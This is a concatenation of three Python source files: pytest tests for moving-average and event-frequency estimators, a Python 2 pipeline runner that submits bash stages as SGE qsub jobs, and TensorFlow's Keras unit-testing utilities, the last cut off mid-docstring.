self._value = 0
def update(self, value: float):
self.updates.append(value)
self._value = value
def reset(self, value: float = 0.0):
self.reset_called = True
self._value = 0
@property
def value(self) -> float:
return self._value
@pytest.fixture(params=[ExponentialMovingAverage])
def ma_type(request):
return request.param
@pytest.fixture()
def mock_averager():
return MockMovingAverage()
@pytest.fixture()
def estimator(mock_averager):
return EventFrequencyEstimator(start_time=START_TIME, window=STEP, averager=mock_averager)
def create_moving_average(cls, start: float) -> Optional[MovingAverage]:
if cls == ExponentialMovingAverage:
return cls(alpha=0.5, start=start)
return None
def test_moving_average_has_initial_value_after_creation(ma_type):
start = 4.2
ma = create_moving_average(ma_type, start)
assert ma.value == start
def test_moving_average_doesnt_change_value_when_fed_same_values(ma_type):
start = 4.2
ma = create_moving_average(ma_type, start)
for _ in range(10):
ma.update(start)
assert ma.value == start
def test_moving_average_has_value_semantics_for_eq(ma_type):
start = 4.2
ma1 = create_moving_average(ma_type, start)
ma2 = create_moving_average(ma_type, start)
assert ma1 == ma2
ma1.update(42)
assert ma1 != ma2
ma2.update(42)
assert ma1 == ma2
def test_moving_average_resets_to_same_state_as_new(ma_type):
ma = create_moving_average(ma_type, 1.3)
for _ in range(10):
ma.update(42)
start = 4.2
ma.reset(start)
assert ma == create_moving_average(ma_type, start)
def test_moving_average_increases_value_when_updated_with_larger_value(ma_type):
start = 4.2
target = 42
ma = create_moving_average(ma_type, start)
for _ in range(10):
last = ma.value
ma.update(target)
assert ma.value > last
assert ma.value < target
def test_moving_average_decreases_value_when_updated_with_smaller_value(ma_type):
start = 4.2
target = -42
ma = create_moving_average(ma_type, start)
for _ in range(10):
last = ma.value
ma.update(target)
assert ma.value < last
assert ma.value > target
def test_moving_average_changes_faster_with_larger_difference_to_target(ma_type):
ma1 = create_moving_average(ma_type, 10.0)
ma2 = create_moving_average(ma_type, 20.0)
for _ in range(10):
last1 = ma1.value
last2 = ma2.value
ma1.update(18.0)
ma2.update(22.0)
assert ma1.value - last1 > ma2.value - last2
def test_exp_moving_average_converges_faster_with_larger_alpha():
start = 4.2
target = 42
ma1 = ExponentialMovingAverage(0.2, start)
ma2 = ExponentialMovingAverage(0.8, start)
for _ in range(10):
ma1.update(target)
ma2.update(target)
assert ma1.value < ma2.value
def test_exp_moving_average_moves_halfway_to_target_in_desired_number_of_steps():
steps = 10
alpha = ExponentialMovingAverage.halfway_alpha(steps)
start = 4.2
target = 42
halfway = 0.5 * (start + target)
ma = ExponentialMovingAverage(alpha, start)
for i in range(steps - 1):
ma.update(target)
assert ma.value < halfway
ma.update(target)
assert ma.value > halfway
def test_event_frequency_estimator_is_initialized_to_zero(mock_averager, estimator):
assert estimator.value == 0
assert mock_averager.updates == []
def test_event_frequency_estimator_updates_with_time_even_if_there_are_no_events(mock_averager, estimator):
estimator.update_time(START_TIME + 3.1 * STEP)
assert estimator.value == 0
assert mock_averager.updates == [0, 0, 0]
def test_event_frequency_estimator_doesnt_updates_when_time_doesnt_advance_enough(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 0.9 * STEP)
assert estimator.value == 0
assert mock_averager.updates == []
def test_event_frequency_estimator_sums_all_events_in_same_window(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 0.3 * STEP)
estimator.add_events(4)
estimator.update_time(START_TIME + 1.2 * STEP)
estimator.add_events(2)
assert estimator.value == 7 / STEP
assert mock_averager.updates == [7 / STEP]
def test_event_frequency_estimator_doesnt_spread_events_between_windows(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 0.3 * STEP)
estimator.add_events(4)
estimator.update_time(START_TIME + 2.2 * STEP)
estimator.add_events(2)
assert estimator.value == 0
assert mock_averager.updates == [7 / STEP, 0]
def test_event_frequency_estimator_resets_everything(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 1.2 * STEP)
estimator.add_events(4)
assert estimator.value == 3 / STEP
assert mock_averager.updates == [3 / STEP]
assert not mock_averager.reset_called
estimator.reset(START_TIME + 3.0 * STEP)
assert estimator.value == 0
assert mock_averager.reset_called
estimator.add_events(2)
estimator.update_time(START_TIME + 4.2 * STEP)
assert estimator.value == 2 / STEP
assert mock_averager.updates == [3 / STEP, 2 / STEP]
@pytest.mark.parametrize("step", [2, 10, 40])
def test_ema_event_frequency_estimator_respects_reaction_time(step):
now = 0.0
half_time = 120.0
estimator = EMAEventFrequencyEstimator(now, half_time)
assert estimator.value == 0
while now < half_time:
estimator.update_time(now)
estimator.add_events(step)
now += step
estimator.update_time(now)
assert math.isclose(estimator.value, 0.5, rel_tol=0.07)
while now < 2.0 * half_time:
estimator.update_time(now)
estimator.add_events(step)
now += step
estimator.update_time(now)
assert math.isclose(estimator.value, 0.75, rel_tol=0.07)
|
|
#!/usr/bin/python
#
import os
import sys
import getopt
import math
import tempfile
import stat
import re
import shlex
import time
import subprocess
from subprocess import Popen
import glob
#import topsort
import topological
from util import get_new_directory
from util import get_new_file
import random
from pypipeline.qsub import get_default_qsub_params, get_qsub_args,\
get_default_qsub_params
def write_script(prefix, script, dir):
out, script_file = get_new_file(prefix=prefix,suffix=".sh",dir=dir)
out.write(script)
out.write("\n")
out.close()
os.system("chmod u+x '%s'" % (script_file))
return script_file
def get_files_in_dir(dirname):
return [f for f in os.listdir(dirname) if os.path.isfile(os.path.join(dirname, f))]
def create_queue_command(script_file, cwd, name="test", prereqs=[], stdout="stdout", qsub_args=None):
# Make the stdout file and script_file relative paths to cwd if possible.
stdout = os.path.relpath(stdout, cwd)
script_file = os.path.relpath(script_file, cwd)
# Create the qsub command.
queue_command = "qsub "
if qsub_args:
queue_command += " " + qsub_args + " "
else:
#queue_command += " -q cpu.q "
queue_command += " -q mem.q -q himem.q -l vf=15.5G "
queue_command += " -cwd -j y -b y -V -N %s -e stderr -o %s " % (name, stdout)
if len(prereqs) > 0:
queue_command += "-hold_jid %s " % (",".join(prereqs))
queue_command += "\"bash '%s'\"" % (script_file)
return queue_command
unique_num = 0
def get_unique_name(name):
global unique_num
unique_num += 1
return name + str(unique_num)
def get_cd_to_bash_script_parent():
return """
# Change directory to the parent directory of the calling bash script.
SOURCE="${BASH_SOURCE[0]}"
while [ -h "$SOURCE" ]; do # resolve $SOURCE until the file is no longer a symlink
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
SOURCE="$(readlink "$SOURCE")"
[[ $SOURCE != /* ]] && SOURCE="$DIR/$SOURCE" # if $SOURCE was a relative symlink, we need to resolve it relative to the path where the symlink file was located
done
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
echo "Changing directory to $DIR"
cd $DIR
"""
def dfs_stages(stage):
stages = set()
stages.add(stage)
#print "stage.name",stage.name
#print "stage.dependents",[x.name for x in stage.dependents]
for dependent in stage.dependents:
for s in dfs_stages(dependent):
if not s in stages:
stages.add(s)
return stages
def bfs_stages(stage):
stages = set()
queue = [stage]
while queue != []:
stage = queue.pop(0)
if not stage in stages:
stages.add(stage)
queue.extend(stage.dependents)
return stages
class Stage:
'''A stage in a pipeline to be run after the stages in prereqs and before the
stages in dependents.
Attributes:
cwd: Current working directory for this stage (Set by PipelineRunner).
serial: True iff this stage will be run in a pipeline using bash, one stage at a time (Set by PipelineRunner).
dry_run: Whether to just do a dry run which will skip the actual running of script in _run_script() (Set by PipelineRunner).
root_dir: Path to root directory for this project (Set by PipelineRunner).
setupenv: Path to setupenv.sh script for setting environment (Set by PipelineRunner).
work_mem_megs: Megabytes required by this stage (Default provided by PipelineRunner).
threads: Number of threads used by this stage (Default provided by PipelineRunner).
minutes: Number of minutes used by this stage (Default provided by PipelineRunner).
qsub_args: The SGE qsub arguments for running the job (Set by PipelineRunner).
qdel_script_file: Path to qdel script for this stage (Set by _run_stage when self.serial is True).
print_to_console: Whether to print stdout/stderr to the console (Set by PipelineRunner).
Private attributes:
prereqs: List of stages that should run before this stage.
dependents: List of stages that should run after this stage.
completion_indicator: Filename to be created upon successful completion.
'''
def __init__(self, completion_indicator="DONE"):
''' If the default completion_indicator is used, it will be created in the cwd for this stage '''
self.completion_indicator = completion_indicator
self.prereqs = []
self.dependents = []
self.cwd = None
self.serial = False
self.root_dir = None
self.setupenv = None
self.work_mem_megs = None
self.threads = None
self.minutes = None
self.qsub_args = None
self.qdel_script_file = None
self.print_to_console = None
# A fixed random number to distinguish this task from
# other runs of this same task within qsub.
self.qsub_rand = random.randint(0, sys.maxint)
def always_relaunch(self):
# We add a non-canonical completion indicator in order to ensure
# that this job will always relaunch.
self.completion_indicator = "DONE_BUT_RELAUNCH"
def add_dependent(self, stage):
stage.prereqs.append(self)
self.dependents.append(stage)
def add_dependents(self, stages):
for stage in stages:
self.add_dependent(stage)
def add_prereq(self, stage):
self.prereqs.append(stage)
stage.dependents.append(self)
def add_prereqs(self, stages):
for stage in stages:
self.add_prereq(stage)
def get_qsub_name(self):
'''Gets the SGE job name.'''
# Create a more unique name for qsub so that multiple the kill script only kills its own job
qsub_name = "%s_%x" % (self.get_name(), self.qsub_rand)
# If qsub name does not begin with a letter, add an "a"
matcher = re.compile('^[a-z,A-Z]').search(qsub_name)
if not matcher:
qsub_name = 'a'+qsub_name
return qsub_name
def run_stage(self, exp_dir):
self.exp_dir = exp_dir
os.chdir(exp_dir)
if self._is_already_completed():
print "Skipping completed stage: name=" + self.get_name() + " completion_indicator=" + self.completion_indicator
return
self._run_stage(exp_dir)
def _run_stage(self, exp_dir):
''' Overidden by GridShardRunnerStage '''
# TODO: This should create another script that calls the experiment
# script, not modify it.
#
# ulimit doesn't work on Mac OS X or the COE (wisp). So we don't use it anymore.
# script += "ulimit -v %d\n" % (1024 * self.work_mem_megs)
# script += "\n"
script = ""
# Always change directory to the current location of this experiment script.
script += get_cd_to_bash_script_parent()
# Source the setupenv.sh script.
script += "source %s\n\n" % (self.setupenv)
# Add the execution.
script += self.create_stage_script(exp_dir)
# Touch a file to indicate successful completion.
script += "\ntouch '%s'\n" % (self.completion_indicator)
script_file = write_script("experiment-script", script, exp_dir)
self._run_script(script_file, exp_dir)
def __str__(self):
return self.get_name()
def _is_already_completed(self):
if not os.path.exists(self.completion_indicator):
return False
for prereq in self.prereqs:
if not prereq._is_already_completed():
return False
return True
def _run_script(self, script_file, cwd, stdout_filename="stdout"):
stdout_path = os.path.join(cwd, stdout_filename)
os.chdir(cwd)
assert(os.path.exists(script_file))
if self.serial:
command = "bash %s" % (script_file)
print self.get_name(),":",command
if self.dry_run: return
stdout = open(stdout_path, 'w')
if not self.print_to_console:
# Print stdout only to a file.
p = Popen(args=shlex.split(command), cwd=cwd, stderr=subprocess.STDOUT, stdout=stdout)
retcode = p.wait()
else:
# Print out stdout to the console and to the file.
p = Popen(args=shlex.split(command), cwd=cwd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
for line in iter(p.stdout.readline, ''):
try:
stdout.write(line)
print line,
except:
pass
retcode = p.wait()
stdout.close()
if (retcode != 0):
if not self.print_to_console:
# Print out the last few lines of the failed stage's stdout file.
os.system("tail -n 15 %s" % (stdout_path))
raise subprocess.CalledProcessError(retcode, command)
#Old way: subprocess.check_call(shlex.split(command))
else:
prereq_names = [prereq.get_qsub_name() for prereq in self.prereqs]
qsub_script = ""
qsub_script += get_cd_to_bash_script_parent() + "\n"
qsub_cmd = create_queue_command(script_file, cwd, self.get_qsub_name(), prereq_names, stdout_path, self.qsub_args)
qsub_script += qsub_cmd
qsub_script_file = write_script("qsub-script", qsub_script, cwd)
print qsub_cmd
if self.dry_run: return
subprocess.check_call(shlex.split("bash %s" % (qsub_script_file)))
qdel_script = "qdel %s" % (self.get_qsub_name())
self.qdel_script_file = write_script("qdel-script", qdel_script, cwd)
def create_stage_script(self, exp_dir):
''' Override this method '''
return None
def get_name(self):
'''Override this method.
Gets display name of this stage and stage directory name.
'''
return None
class NamedStage(Stage):
def __init__(self, name, completion_indicator="DONE"):
Stage.__init__(self, completion_indicator)
self._name = str(name) #TODO: is this the best way to handle name's type?
def get_name(self):
return self._name
class ScriptStringStage(NamedStage):
def __init__(self, name, script, completion_indicator="DONE"):
NamedStage.__init__(self, name, completion_indicator)
self.script = script
def create_stage_script(self, exp_dir):
return self.script
class RootStage(NamedStage):
def __init__(self):
NamedStage.__init__(self, "root_stage")
def run_stage(self, exp_dir):
# Intentionally a no-op
pass
class PipelineRunner:
def __init__(self,name="experiments", queue=None, print_to_console=False, dry_run=False, rolling=False):
self.name = name
self.serial = (queue == None)
self.root_dir = os.path.abspath(".")
self.setupenv = os.path.abspath("./setupenv.sh")
if not os.path.exists(self.setupenv):
print "ERROR: File not found:", self.setupenv
print "ERROR: The file setupenv.sh must be located in the current working directory"
sys.exit(1)
self.print_to_console = print_to_console
self.rolling = rolling
self.dry_run = dry_run
# Setup arguments for qsub
self.queue = queue
(threads, work_mem_megs, minutes) = get_default_qsub_params(queue)
self.threads = threads
self.work_mem_megs = work_mem_megs
self.minutes = minutes
def run_pipeline(self, root_stage):
self._check_stages(root_stage)
top_dir = os.path.join(self.root_dir, "exp")
if self.rolling:
exp_dir = os.path.join(top_dir, self.name)
os.system("rm -r %s" % (exp_dir))
# TODO: add support for rolling directories
else:
exp_dir = get_new_directory(prefix=self.name, dir=top_dir)
os.chdir(exp_dir)
for stage in self.get_stages_as_list(root_stage):
if isinstance(stage, RootStage):
continue
cwd = os.path.join(exp_dir, str(stage.get_name()))
os.mkdir(cwd)
self._update_stage(stage, cwd)
stage.run_stage(cwd)
if not self.serial:
# Create a global qdel script
global_qdel = ""
for stage in self.get_stages_as_list(root_stage):
if isinstance(stage, RootStage):
continue
global_qdel += "bash %s\n" % (stage.qdel_script_file)
write_script("global-qdel-script", global_qdel, exp_dir)
def _update_stage(self, stage, cwd):
'''Set some additional parameters on the stage.'''
stage.cwd = cwd
stage.serial = self.serial
stage.dry_run = self.dry_run
stage.root_dir = self.root_dir
stage.setupenv = self.setupenv
# Use defaults for threads, work_mem_megs, and minutes if they are not
# set on the stage.
if stage.threads is None:
stage.threads = self.threads
if stage.work_mem_megs is None:
stage.work_mem_megs = self.work_mem_megs
if stage.minutes is None:
stage.minutes = self.minutes
if stage.print_to_console is None:
stage.print_to_console = self.print_to_console
# Get the stage's qsub args.
stage.qsub_args = get_qsub_args(self.queue, stage.threads, stage.work_mem_megs, stage.minutes)
def _check_stages(self, root_stage):
all_stages = self.get_stages_as_list(root_stage)
names = set()
for stage in all_stages:
if stage.get_name() in names:
print "ERROR: All stage names:\n" + "\n".join([s.get_name() for s in all_stages])
print "ERROR: Multiple stages have the same name: " + stage.get_name()
print "ERROR: Num copies:", len([x for x in all_stages if x.get_name() == stage.get_name()])
assert stage.get_name() not in names, "ERROR: Multiple stages have the same name: " + stage.get_name()
names.add(stage.get_name())
print "All stages:"
for stage in all_stages:
print "\t",stage.get_name()
print "Number of stages:", len(all_stages)
def get_stages_as_list(self, root_stage):
return topological.bfs_topo_sort(root_stage)
if __name__ == '__main__':
print "This script is not to be run directly"
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for unit-testing Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
def get_test_data(train_samples,
test_samples,
input_shape,
num_classes,
random_seed=None):
"""Generates test data to train a model on.
Arguments:
train_samples: Integer, how many training samples to generate.
test_samples: Integer, how many test samples to generate.
input_shape: Tuple of integers, shape of the inputs.
num_classes: Integer, number of classes for the data and targets.
random_seed: Integer, random seed used by numpy to generate data.
Returns:
A tuple of Numpy arrays: `(x_train, y_train), (x_test, y_test)`.
"""
if random_seed is not None:
np.random.seed(random_seed)
num_sample = train_samples + test_samples
templates = 2 * num_classes * np.random.random((num_classes,) + input_shape)
y = np.random.randint(0, num_classes, size=(num_sample,))
x = np.zeros((num_sample,) + input_shape, dtype=np.float32)
for i in range(num_sample):
x[i] = templates[y[i]] + np.random.normal(loc=0, scale=1., size=input_shape)
return ((x[:train_samples], y[:train_samples]),
(x[train_samples:], y[train_samples:]))
def layer_test(layer_cls, kwargs=None, input_shape=None, input_dtype=None,
input_data=None, expected_output=None,
expected_output_dtype=None):
"""Test routine for a layer with a single input and single output.
Arguments:
layer_cls: Layer class object.
kwargs: Optional dictionary of keyword arguments for instantiating the
layer.
input_shape: Input shape tuple.
input_dtype: Data type of the input data.
input_data: Numpy array of input data.
expected_output: Shape tuple for the expected shape of the output.
expected_output_dtype: Data type expected for the output.
Returns:
The output data (Numpy array) returned by the layer, for additional
checks to be done by the calling code.
Raises:
ValueError: if `input_shape is None`.
"""
if input_data is None:
if input_shape is None:
raise ValueError('input_shape is None')
if not input_dtype:
input_dtype = 'float32'
input_data_shape = list(input_shape)
for i, e in enumerate(input_data_shape):
if e is None:
input_data_shape[i] = np.random.randint(1, 4)
input_data = 10 * np.random.random(input_data_shape)
if input_dtype[:5] == 'float':
input_data -= 0.5
input_data = input_data.astype(input_dtype)
elif input_shape is None:
input_shape = input_data.shape
if input_dtype is None:
input_dtype = input_data.dtype
if expected_output_dtype is None:
expected_output_dtype = input_dtype
# instantiation
kwargs = kwargs or {}
layer = layer_cls(**kwargs)
# test get_weights , set_weights at layer level
weights = layer.get_weights()
layer.set_weights(weights)
# test and instantiation from weights
if 'weights' in tf_inspect.getargspec(layer_cls.__init__):
kwargs['weights'] = weights
layer = layer_cls(**kwargs)
# test in functional API
x = keras.layers.Input(shape=input_shape[1:], dtype=input_dtype)
y = layer(x)
if keras.backend.dtype(y) != expected_output_dtype:
raise AssertionError('When testing layer %s, for input %s, found output '
'dtype=%s but expected to find %s.\nFull kwargs: %s' %
(layer_cls.__name__,
x,
keras.backend.dtype(y),
expected_output_dtype,
kwargs))
# check shape inference
model = keras.models.Model(x, y)
expected_output_shape = tuple(
layer.compute_output_shape(
tensor_shape.TensorShape(input_shape)).as_list())
actual_output = model.predict(input_data)
actual_output_shape = actual_output.shape
for expected_dim, actual_dim in zip(expected_output_shape,
actual_output_shape):
if expected_dim is not None:
if expected_dim != actual_dim:
raise AssertionError(
'When testing layer %s, for input %s, found output_shape='
'%s but expected to find %s.\nFull kwargs: %s' %
(layer_cls.__name__,
x,
actual_output_shape,
expected_output_shape,
kwargs))
if expected_output is not None:
np.testing.assert_allclose(actual_output, expected_output, rtol=1e-3)
# test serialization, weight setting at model level
model_config = model.get_config()
recovered_model = keras.models.Model.from_config(model_config)
if model.weights:
weights = model.get_weights()
recovered_model.set_weights(weights)
output = recovered_model.predict(input_data)
np.testing.assert_allclose(output, actual_output, rtol=1e-3)
# test training mode (e.g. useful for dropout tests)
# Rebuild the model to avoid the graph being reused between predict() and
# train(). This was causing some error for layer with Defun as it body.
# See b/120160788 for more details. This should be mitigated after 2.0.
model = keras.models.Model(x, layer(x))
if _thread_local_data.run_eagerly is not None:
model.compile(
'rmsprop',
'mse',
weighted_metrics=['acc'],
run_eagerly=should_run_eagerly())
else:
model.compile('rmsprop', 'mse', weighted_metrics=['acc'])
model.train_on_batch(input_data, actual_output)
# test as first layer in Sequential API
layer_config = layer.get_config()
layer_config['batch_input_shape'] = input_shape
layer = layer.__class__.from_config(layer_config)
model = keras.models.Sequential()
model.add(layer)
actual_output = model.predict(input_data)
actual_output_shape = actual_output.shape
for expected_dim, actual_dim in zip(expected_output_shape,
actual_output_shape):
if expected_dim is not None:
if expected_dim != actual_dim:
raise AssertionError(
'When testing layer %s **after deserialization**, '
'for input %s, found output_shape='
'%s but expected to find inferred shape %s.\nFull kwargs: %s' %
(layer_cls.__name__,
x,
actual_output_shape,
expected_output_shape,
kwargs))
if expected_output is not None:
np.testing.assert_allclose(actual_output, expected_output, rtol=1e-3)
# test serialization, weight setting at model level
model_config = model.get_config()
recovered_model = keras.models.Sequential.from_config(model_config)
if model.weights:
weights = model.get_weights()
recovered_model.set_weights(weights)
output = recovered_model.predict(input_data)
np.testing.assert_allclose(output, actual_output, rtol=1e-3)
# for further checks in the caller function
return actual_output
_thread_local_data = threading.local()
_thread_local_data.model_type = None
_thread_local_data.run_eagerly = None
@tf_contextlib.contextmanager
def model_type_scope(value):
"""Provides a scope within which the model type to test is equal to `value`.
The model type gets restored to its original value upon exiting the scope.
Arguments:
value: model type value
Yields:
The provided value.
"""
previous_value = _thread_local_data.model_type
try:
_thread_local_data.model_type = value
yield value
finally:
# Restore model type to initial value.
_thread_local_data.model_type = previous_value
@tf_contextlib.contextmanager
def run_eagerly_scope(value):
"""Provides a scope within which we compile models to run eagerly or not.
The boolean gets restored to its original value upon exiting the scope.
Arguments:
value: Bool specifying if we should run models eagerly in the active test.
Should be True or False.
Yields:
The provided value.
"""
previous_value = _thread_local_data.run_eagerly
try:
_thread_local_data.run_eagerly = value
yield value
finally:
# Restore model type to initial value.
_thread_local_data.run_eagerly = previous_value
def should_run_eagerly():
"""Returns whether the models we are testing should be run eagerly."""
if _thread_local_data.run_eagerly is None:
raise ValueError('Cannot call `should_run_eagerly()` outside of a '
'`run_eagerly_scope()` or `run_all_keras_modes` '
'decorator.')
return _thread_local_data.run_eagerly and context.executing_eagerly()
def get_model_type():
"""Gets the model type that should be tested."""
if _thread_local_data.model_type is None:
raise ValueError('Cannot call `get_model_type()` outside of a '
'`model_type_scope()` or `run_with_all_model_types` '
'decorator.')
return _thread_local_data.model_type
def get_small_sequential_mlp(num_hidden, num_classes, input_dim=None):
model = keras.models.Sequential()
if input_dim:
model.add(keras.layers.Dense(num_hidden, activation='relu',
input_dim=input_dim))
else:
model.add(keras.layers.Dense(num_hidden, activation='relu'))
activation = 'sigmoid' if num_classes == 1 else 'softmax'
model.add(keras.layers.Dense(num_classes, activation=activation))
return model
def get_small_functional_mlp(num_hidden, num_classes, input_dim):
inputs = keras.Input(shape=(input_dim,))
outputs = keras.layers.Dense(num_hidden, activation='relu')(inputs)
activation = 'sigmoid' if num_classes == 1 else 'softmax'
outputs = keras.layers.Dense(num_classes, activation=activation)(outputs)
return keras.Model(inputs, outputs)
class _SmallSubclassMLP(keras.Model):
"""A subclass model based small MLP."""
def __init__(self, num_hidden, num_classes):
super(_SmallSubclassMLP, self).__init__()
self.layer_a = keras.layers.Dense(num_hidden, activation='relu')
activation = 'sigmoid' if num_classes == 1 else 'softmax'
self.layer_b = keras.layers.Dense(num_classes, activation=activation)
def call(self, inputs, **kwargs):
x = self.layer_a(inputs)
return self.layer_b(x)
class _SmallSubclassMLPCustomBuild(keras.Model):
"""A subclass model small MLP that uses a custom build method."""
def __init__(self, num_hidden, num_classes):
super(_SmallSubclassMLPCustomBuild, self).__init__()
self.layer_a = None
self.layer_b = None
self.num_hidden = num_hidden
self.num_classes = num_classes
def build(self, input_shape):
self.layer_a = keras.layers.Dense(self.num_hidden, activation='relu')
activation = 'sigmoid' if self.num_classes == 1 else 'softmax'
self.layer_b = keras.layers.Dense(self.num_classes, activation=activation)
def call(self, inputs, **kwargs):
x = self.layer_a(inputs)
return self.layer_b(x)
def get_small_subclass_mlp(num_hidden, num_classes):
return _SmallSubclassMLP(num_hidden, num_classes)
def get_small_subclass_mlp_with_custom_build(num_hidden, num_classes):
return _SmallSubclassMLPCustomBuild(num_hidden, num_classes)
def get_small_mlp(num_hidden, num_classes, input_dim):
"""Get a small mlp of the model type specified by `get_model_type`."""
model_type = get_model_type()
if model_type == 'subclass':
return get_small_subclass_mlp(num_hidden, num_classes)
if model_type == 'subclass_custom_build':
return get_small_subclass_mlp_with_custom_build(num_hidden, num_classes)
if model_type == 'sequential':
return get_small_sequential_mlp(num_hidden, num_classes, input_dim)
if model_type == 'functional':
return get_small_functional_mlp(num_hidden, num_classes, input_dim)
raise ValueError('Unknown model type {}'.format(model_type))
class _SubclassModel(keras.Model):
"""A Keras subclass model."""
def __init__(self, layers):
super(_SubclassModel, self).__init__()
# Note that clone and build doesn't support lists of layers in subclassed
# models. Adding each layer directly here.
for i, layer in enumerate(layers):
setattr(self, self._layer_name_for_i(i), layer)
self.num_layers = len(layers)
def _layer_name_for_i(self, i):
return 'layer{}'.format(i)
def call(self, inputs, **kwargs):
x = inputs
for i in range(self.num_layers):
layer = getattr(self, self._layer_name_for_i(i))
x = layer(x)
return x
class _SubclassModelCustomBuild(keras.Model):
"""A Keras subclass model that uses a custom build method."""
def __init__(self, layer_generating_func):
super(_SubclassModelCustomBuild, self).__init__()
self.all_layers = None
self._layer_generating_func = layer_generating_func
def build(self, input_shape):
layers = []
for layer in self._layer_generating_func():
layers.append(layer)
self.all_layers = layers
def call(self, inputs, **kwargs):
x = inputs
for layer in self.all_layers:
x = layer(x)
return x
def get_model_from_layers(layers, input_shape=None):
"""Builds a model from a sequence of layers."""
model_type = get_model_type()
if model_type == 'subclass':
return _SubclassModel(layers)
if model_type == 'subclass_custom_build':
layer_generating_func = lambda: layers
return _SubclassModelCustomBuild(layer_generating_func)
if model_type == 'sequential':
model = keras.models.Sequential()
if input_shape:
model.add(keras.layers.InputLayer(input_shape=input_shape))
for layer in layers:
model.add(layer)
return model
if model_type == 'functional':
if not input_shape:
raise ValueError('Cannot create a functional model from layers with no '
'input shape.')
inputs = keras.Input(shape=input_shape)
outputs = inputs
for layer in layers:
outputs = layer(outputs)
return keras.Model(inputs, outputs)
raise ValueError('Unknown model type {}'.format(model_type))
class _MultiIOSubclassModel(keras.Model):
"""Multi IO Keras subclass model."""
def __init__(self, branch_a, branch_b, shared_input_branch=None,
shared_output_branch=None):
super(_MultiIOSubclassModel, self).__init__()
self._shared_input_branch = shared_input_branch
self._branch_a = branch_a
self._branch_b = branch_b
self._shared_output_branch = shared_output_branch
def call(self, inputs, **kwargs):
if self._shared_input_branch:
for layer in self._shared_input_branch:
inputs = layer(inputs)
a = inputs
b = inputs
else:
a, b = inputs
for layer in self._branch_a:
a = layer(a)
for layer in self._branch_b:
b = layer(b)
outs = [a, b]
if self._shared_output_branch:
for layer in self._shared_output_branch:
outs = layer(outs)
return outs
class _MultiIOSubclassModelCustomBuild(keras.Model):
"""Multi IO Keras subclass model that uses a custom build method."""
def __init__(self, branch_a_func, branch_b_func,
shared_input_branch_func=None,
shared_output_branch_func=None):
super(_MultiIOSubclassModelCustomBuild, self).__init__()
self._shared_input_branch_func = shared_input_branch_func
self._branch_a_func = branch_a_func
self._branch_b_func = branch_b_func
self._shared_output_branch_func = shared_output_branch_func
self._shared_input_branch = None
self._branch_a = None
self._branch_b = None
self._shared_output_branch = None
def build(self, input_shape):
if self._shared_input_branch_func():
self._shared_input_branch = self._shared_input_branch_func()
self._branch_a = self._branch_a_func()
self._branch_b = self._branch_b_func()
if self._shared_output_branch_func():
self._shared_output_branch = self._shared_output_branch_func()
def call(self, inputs, **kwargs):
if self._shared_input_branch:
for layer in self._shared_input_branch:
inputs = layer(inputs)
a = inputs
b = inputs
else:
a, b = inputs
for layer in self._branch_a:
a = layer(a)
for layer in self._branch_b:
b = layer(b)
outs = a, b
if self._shared_output_branch:
for layer in self._shared_output_branch:
outs = layer(outs)
return outs
def get_multi_io_model(
branch_a,
branch_b,
shared_input_branch=None,
shared_output_branch=None):
"""Builds a multi-io model that contains two branches.
The produced model will be of the type specified by `get_model_type`.
To build a two-input, two-output model:
Specify a list of layers for branch a and branch b, but do not specify any
shared input branch or shared output branch. The resulting model will apply
each branch to a different input, to produce two outputs.
The first value in branch_a must be the Keras 'Input' layer for branch a,
and the first value in branch_b must be the Keras 'Input' layer for
branch b.
example usage:
```
branch_a = [Input(shape=(2,), name='a'), Dense(), Dense()]
branch_b = [Input(shape=(3,), name='b'), Dense(), Dense()]
model = get_multi_io_model(branch_a, branch_b)
```
To build a two-input, one-output model:
Specify a list of layers for branch a and branch b, and specify a
shared output branch. The resulting model will apply
each branch to a different input. It will then apply the shared output
branch to a tuple containing the intermediate outputs of each branch,
to produce a single output. The first layer in the shared_output_branch
must be able to merge a tuple of two tensors.
The first value in branch_a must be the Keras 'Input' layer for branch a,
and the first value in branch_b must be the Keras 'Input' layer for
branch b.
example usage:
```
input_branch_a = [Input(shape=(2,), name='a'), Dense(), Dense()]
input_branch_b = [Input(shape=(3,), name='b'), Dense(), Dense()]
shared_output_branch = [Concatenate(), Dense(), Dense()]
model = get_multi_io_model(input_branch_a, input_branch_b,
shared_output_branch=shared_output_branch)
```
To build a one-input, two-output model:
Specify a list of layers for branch a and branch b, and specify a
shared input branch. The resulting model will take one input, and apply
the shared input branch to it. It will then respectively apply each branch
to that intermediate result in parallel, to produce two outputs.
The first value in the shared_input_branch must be the Keras 'Input' layer
for the whole model. Branch a and branch b should not contain any Input
layers.
example usage:
```
shared_input_branch = [Input(shape=(2,), name='in'), Dense(), Dense()]
output_branch_a = [Dense(), Dense()]
output_branch_b = [Dense(), Dense()]
model = get_multi_io_model(output__branch_a, output_branch_b,
shared_input_branch=shared_input_branch)
```
Args:
